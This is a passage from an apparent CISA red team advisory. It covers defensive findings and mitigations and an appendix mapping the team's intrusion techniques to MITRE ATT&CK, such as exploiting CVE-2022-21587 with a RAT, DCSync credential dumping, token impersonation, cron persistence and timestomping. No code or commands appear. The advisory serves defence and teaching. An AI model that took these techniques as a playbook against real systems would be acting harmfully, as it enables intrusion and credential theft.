Issues Finding Recommendation Inadequate firewall between perimeter and internal devices Deploy internal and external network firewalls to inspect, log, and/or block unknown or unauthorized traffic. Perform deep packet inspection to detect mismatched application traffic or encrypted data flows. Restrict outbound internet egress to hosts whenever possible. Establish a baseline of normal user activity, including unique IPs or domains. Insufficient Network Segmentation Apply the principle of least privilege to limit the exposure of systems and services in the demilitarized zone (DMZ). Segment the DMZ based on the sensitivity of systems and services as well as the internal network [CPG 2.F]. Segment networks to protect assets and workstations from direct exposure to the internet by considering the criticality of the asset to business functions, sensitivity of the data traversing the asset, and requirements for internet access to the asset. Implement and regularly test firewalls, access control lists, and intrusion prevention systems. Take advantage of opportunities to create natural network segmentation. Securely configured VPNs used for remote laptops, for instance, create an easy place to filter and monitor incoming traffic. Trust relationships between domains were overly permissive Restrict network connectivity (ingress and egress) to only necessary services between trusted domains [CPG 2.E]. Regularly monitor privileged access via Foreign Security Principals (FSPs). Defensive activity was not sufficiently isolated Perform network defense investigations out-of-band [CPG 3.A]. Conduct regular security audits and penetration testing by internal and external parties. Develop and implement a comprehensive Incident Response Plan (IRP) and conduct regular drills and simulations [CPG 2.S]. IDM solutions were not fully understood and utilized Enroll all accounts in IDM solutions and test against common credential manipulation techniques. Integrate the IDM solution with other systems and applications, allowing for the streamlining of workflows. Insufficient role-based host segmentation Establish Role-Based Access Controls (RBAC) to systematically assign permissions based on job functions [CPG 2.E]. Implement a comprehensive security model incorporating micro-segmentation at the host level. Failure to monitor EDR alerts daily Develop and document Standard Operating Procedures (SOPs) for handling EDR alerts [CPG 5.A]. Establish and maintain incident response playbooks. Conduct regular audits and reviews of the EDR alert handling process. Host artifacts were overly trusted Operationalize and deploy File Integrity Monitoring (FIM) solutions. Regularly review and adjust access permissions, adhering to the principle of least privilege [CPG 2.E]. Establish proper forensic processes to ensure integrity. Bureaucracy and decentralization of network defenders hampered communication and consistency Introduce cross-training initiatives to cultivate a collaborative culture. Encourage the establishment of cross-functional projects. Utilize collaboration platforms that seamlessly integrate various tools and systems. Insufficient internal incident response report Promote a culture of ongoing improvement while also fostering a proactive approach among employees to promptly report suspicious activities. Treat suspected incidents of compromise as a confirmed breach, and account for a threat actor’s ability to move laterally when defining the scope of incident response efforts. Focus on known/common IOCs Employ centralized logging and tool-agnostic detection methods. Leverage threat intelligence feeds by integrating them into a SIEM tool. Implement regular updates for IOCs and TTPs, with the capability for customization to address the specific threat landscape [CPG 3.A]. Detection rules were visible from compromised systems Integrate runtime detection mechanisms while removing world-readable configuration files from installer deployments where applicable. Insufficient restriction of admin tools Enhance security posture by implementing application allowlisting to ensure only trusted and approved applications are permitted [CPG 2.Q]. Apply the principle of least privilege by granting users only the minimum level of access necessary to perform job functions. Insufficient tracking of software Conduct a comprehensive inventory of assets and establish a baseline for behavior [CPG 1.A]. Utilize a Software Asset Management (SAM) solution that offers comprehensive tracking, reporting, and compliance management capabilities. Deploy automated discovery and monitoring tools to continuously scan and identify new and existing software. CISA recommends organizations implement the recommendations in Table 2 to mitigate other identified issues that can be uncovered through traditional penetration tests or red team assessments. Table 2: Recommendations to Mitigate Identified Issues Issue Recommendation Accounts were overprivileged and the organization’s network contained unnecessary service accounts Apply the principle of least privilege when assigning permissions to user accounts. Audit existing group memberships, strip unnecessary privileges, and prune unnecessary nested groups/users. Monitor for account lockout, especially on administrative accounts, and switch to a manual account unlock policy. Increase monitoring for higher-risk accounts, such as service accounts, that are highly privileged and have a predictable pattern of behavior (e.g., scans that reliably run at a certain hour of the day). Privileged users should have dedicated role-based user accounts and associated jump hosts to log into critical resources. Insufficient EDR configuration Ensure all hosts have a form of EDR installed. Deploy an EDR capable of catching commonly known obfuscation or execution techniques. Insecure and insufficient credentials Ensure sensitive credentials and documents are not stored in an accessible place. Mandate strong and complex passwords [CPG 2.B]. For more information, see CISA’s Secure Our World: Require Strong Passwords. Note: The above mitigations apply to critical infrastructure organizations with on-premises or hybrid environments. CISA encourage all organizations to prioritize purchasing products from manufacturers who demonstrate secure by design principles, such as evidenced by follow-on publications from companies who have signed the Secure by Design Pledge. Software Manufacturers CISA recognizes that insecure software is the root cause of many flaws; the responsibility should not rest on the end user. CISA urges software manufacturers to implement the following: Eliminate default passwords and determine what password practices should be required (such as minimum password length and disallowing known breached passwords). Configure software to use more secure authentication schemes by default. Provide logging at no additional charge. Cloud services and on-premises products should commit to generating and storing security related logs at no additional cost. Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers—in conjunction with customers—to understand how response teams use logs to investigate incidents. The goal is to develop logs that yield a comprehensive story of the event. Remove unnecessary software dependencies. Unnecessary software increases the attack surface available to adversaries and may introduce additional vulnerabilities. Mitigating these additional vulnerabilities requires significant investment, consuming resources like time, technical personnel, and adding to the level of security effort. These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates. For more information on secure by design, see CISA’s Secure by Design webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. VALIDATE SECURITY CONTROLS In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Tables 3–11). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES Layering Network Security Through Segmentation Recommended Practice: Improving Industrial Control System Cybersecurity with Defense-in-Depth Strategies Phishing Guidance: Stopping the Attack Cycle at Phase One BOFs Detecting DCSync App Domain Hijacking Overview DISCLAIMER The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA. VERSION HISTORY July 11, 2024: Initial version. APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 3–11 for all referenced threat actor tactics and techniques in this advisory. Table 3: Reconnaissance Technique Title ID Use Search Victim-Owned Websites T1594 CISA’s red team used open source tools and services to probe the organization’s internet-facing presence and gather information, including names, roles, and contact information. Gather Victim Network Information: DNS T1590.002 The red team gathered information about the organization’s DNS records, which revealed several details about the organization's internal network. Gather Victim Identity Information: Employee Names T1589.003 CISA’s red team collected the assessed organizations’ employee names to use their email addresses for specific targeting based on roles and responsibilities. Gather Victim Org Information: Identity Roles T1591.004 CISA’s red team selected specific individuals from the assessed organization and targeted them with phishing payloads. Table 4: Command and Control Technique Title ID Use Application Layer Protocol: Web Protocols T1071.001 The red team exploited CVE-2022-21587 and ran a RAT that provided consistent C2 via open Transmission Control Protocol (TCP) ports. Non-Standard Port T1571 The red team used SSH over ports 80 and/or 443 when establishing outbound C2. Proxy: Domain Fronting T1090.004 CISA’s red team leveraged domain fronting to redirect and obfuscate their traffic. Table 5: Credential Access Technique Title ID Use Brute Force: Password Cracking T1110.002 The red team cracked an account’s password by using a common wordlist. OS Credential Dumping: DCSync T1003.006 CISA’s red team pulled credentials for the domain via DCSync to gain full access to the domain. Unsecured Credentials: Bash History T1552.003 The red team obtained a password by searching a user’s bash command history, which provided further unprivileged access throughout the network. Table 6: Discovery Technique Title ID Use Domain Trust Discovery T1482 CISA’s red team inspected the assessed organization’s domain trust relationships through LDAP and identified potential connections in external organizations to which to move laterally. File and Directory Discovery T1083 The red team data mined numerous internal servers and discovered one misconfigured share that contained plaintext usernames and passwords for several privileged service accounts. Table 7: Privilege Escalation Technique Title ID Use Hijack Execution Flow: Path Interception by PATH Environment Variable T1574.007 The red team hijacked the execution flow of a program that used a relative path instead of an absolute path, which enabled the capture of the account’s password. Access Token Manipulation: Token Impersonation/Theft T1134.001 CISA’s red team impersonated the tokens of current users to exploit valid sessions and bypass the organization’s IDM. Access Token Manipulation: Make and Impersonate Token T1134.003 CISA’s red team created new tokens and logon sessions for accounts not registered with the IDM to escalate privileges. Table 8: Lateral Movement Technique Title ID Use Remote Services: SSH T1021.004 CISA’s red team used SSH with a valid account to move through the enclave. Proxy T1090 The red team used a SOCKS proxy to avoid direct connections to their infrastructure and obscure the source of the malicious traffic. Use Alternate Authentication Material: Pass the Hash T1550.002 The red team’s operations were hindered by the organization’s IDM when it blocked the team's attempts to bypass system access controls using different hash types for authentication. Use Alternate Authentication Material: Pass the Ticket T1550.003 CISA’s red team’s operations were hindered by the organization’s IDM when it blocked the team’s attempts to bypass system access controls using Kerberos tickets for authentication. Table 9: Collection Technique Title ID Use Data from Local System T1005 CISA’s red team searched each host for files containing sensitive or interesting information such as password hashes, account information, network configurations, etc. Table 10: Persistence Technique Title ID Use Scheduled Task/Job: Cron T1053.003 The red team used the cron utility to perform task scheduling and execute malicious code within Unix systems at specified times. Scheduled Task/Job: At T1053.002 CISA’s red team used the at utility to perform task scheduling and execute malicious code within Unix systems at a specified time and date. Hijack Execution Flow: AppDomainManager T1574.014 The red team executed malicious payloads by hijacking how the .NETAppDomainManager loads assemblies. Valid Accounts: Domain Accounts T1078.002 CISA’s red team regularly used compromised valid domain accounts managed by Active Directory, giving access to resources of the domain. Table 11: Defensive Evasion Technique Title ID Use Masquerading: Masquerade Task or Service T1036.004 The red team enumerated local files and running processes to gather information for their payloads and persistence mechanisms to appear as legitimate activity. Obfuscated Files or Information T1027 CISA’s red team encrypted, encoded, and obfuscated their executables and C2 channels to evade defenses across the network. File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification T1222.002 The red team modified file permissions with touch and chmod/chown commands to obfuscate their activity and blend in with other files in the environment. Indicator Removal: Timestomp T1070.006 CISA’s red team modified file timestamps to hide their operational activity.
You can subscribe to this RSS to get more information